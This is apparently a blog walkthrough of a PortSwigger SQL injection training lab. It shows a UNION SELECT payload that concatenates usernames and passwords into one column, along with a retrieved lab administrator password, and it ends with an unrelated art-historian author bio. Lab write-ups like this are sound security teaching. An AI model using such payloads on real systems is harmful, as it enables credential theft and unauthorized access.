ScrollUnlock

LAB 6: SQL injection UNION attack, retrieving multiple values in a single column

Problem Statement :

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution:

  1. In order to solve this lab, I have to first figure out how can I retrieve data from other tables into one single column (Heading says retrieving multiple values in a single column).

Administrator

3kg6bba8ibuwhhz0xc0m

The URL was crafted as

' UNION SELECT NULL, CONCAT (Username, password) FROM users--

This then restored all both the tables data into single column.

Here we can see the same example in MS SQL DB. Where in CONCAT also takes care of joining A String with Integer.

Response

  1. Solving SQL Injection Lab’s from PortSwigger | Scroll Unlock Avatar
    Solving SQL Injection Lab’s from PortSwigger | Scroll Unlock

    […] LAB 6: SQL injection UNION attack, retrieving multiple values in a single column […]

    Like

    Reply

Leave a comment

From the blog

About the author

Sophia Bennett is an art historian and freelance writer with a passion for exploring the intersections between nature, symbolism, and artistic expression. With a background in Renaissance and modern art, Sophia enjoys uncovering the hidden meanings behind iconic works and sharing her insights with art lovers of all levels. When she’s not visiting museums or researching the latest trends in contemporary art, you can find her hiking in the countryside, always chasing the next rainbow.